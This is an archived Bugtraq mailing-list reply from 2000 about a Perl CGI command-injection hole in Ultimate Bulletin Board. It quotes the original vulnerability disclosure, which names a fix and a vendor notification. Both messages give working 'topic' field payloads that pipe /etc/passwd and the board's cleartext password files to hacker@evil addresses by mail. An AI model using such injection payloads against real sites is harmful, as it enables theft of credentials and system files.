[13858] in bugtraq
Re: perl-cgi hole in UltimateBB by Infopop Corp.
daemon@ATHENA.MIT.EDU (Kevin Hillabolt)
Tue Feb 15 20:45:31 2000
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Message-Id: <005b01bf774e$0dd17b10$0201a8c0@kevin>
Date: Mon, 14 Feb 2000 18:46:11 -0600
Reply-To: Kevin Hillabolt <khill@BIGFOOT.COM>
From: Kevin Hillabolt <khill@BIGFOOT.COM>
X-To: "Sergei A. Golubchik" <serg@INFOMAG.APE.RELARN.RU>
To: BUGTRAQ@SECURITYFOCUS.COM
It works on the full version also...
Little different syntax:
topic=012345.cgi|cat%20../Members/*|mail hacker@evil.org|
(note the ../ on the Members. You have to go up a directory to get the
file. Maybe you could stop it via simple folder permissions??)
Regards,
Kevin Hillabolt
----- Original Message -----
From: "Sergei A. Golubchik" <serg@INFOMAG.APE.RELARN.RU>
To: <BUGTRAQ@securityfocus.com>
Sent: Friday, February 11, 2000 1:49 PM
Subject: perl-cgi hole in UltimateBB by Infopop Corp.
> Hello.
>
> Writing cgi scripts in perl is simple. It's also rather safe,
> providing authors follow very simple instructions. But they don't.
>
> Browsing some site, I found that their forums were based not on home-
> made scripts, but rather commercial software product. Hey, said I to
> myself, remember those story about pcweek hack ? They use commercial
> package photoads. Let's look what that Ultimate Bulletin Board by
> Infopop is.
>
> I grabbed freeware version from http://www.ultimatebb.com and
> after 10-minutes grepping found those lines:
>
> ubb_library.pl:901-902
> if ($ThreadFile =~ /\d\d\d\d\d\d\.ubb/) {
> open (MESSAGE, "$ForumsPath/Forum$number/$ThreadFile");
>
> (notice? not /^\d\d\d\d\d\d\.ubb$/. What did the author think about while
> writing it ? Girls ?)
>
> And the $ThreadFile takes its value directly from the hidden (hmm!)
> field `topic'.
>
> So when I filled the form with
> topic='012345.ubb|mail hacker@evil.com </etc/passwd|'
> It happily gives me /etc/passwd. And
> topic='012345.ubb|cat Members/*|mail hacker@evil.org|'
> shows all users of bulletin board, and their passwords too (in
cleartext!).
>
> So one should only open "reply" form in the forum, save it to disk,
> and set topic field to whatever he want. And this stupid UBB (at least
> freeware version) doesn't keep the logs (unless, so-called, hacklog,
> used when the condition above is not met).
>
> The fix is obvious. But the rule of the thumb is "do not use magic perl
open".
> At least in cgi scripts. If you want to open regular file, sysopen does
> the trick as well.
>
> And again: CHECK EVERYTHING!
>
> Regards,
> SerG.
>
> P.S. Vendor was notified.
>
>
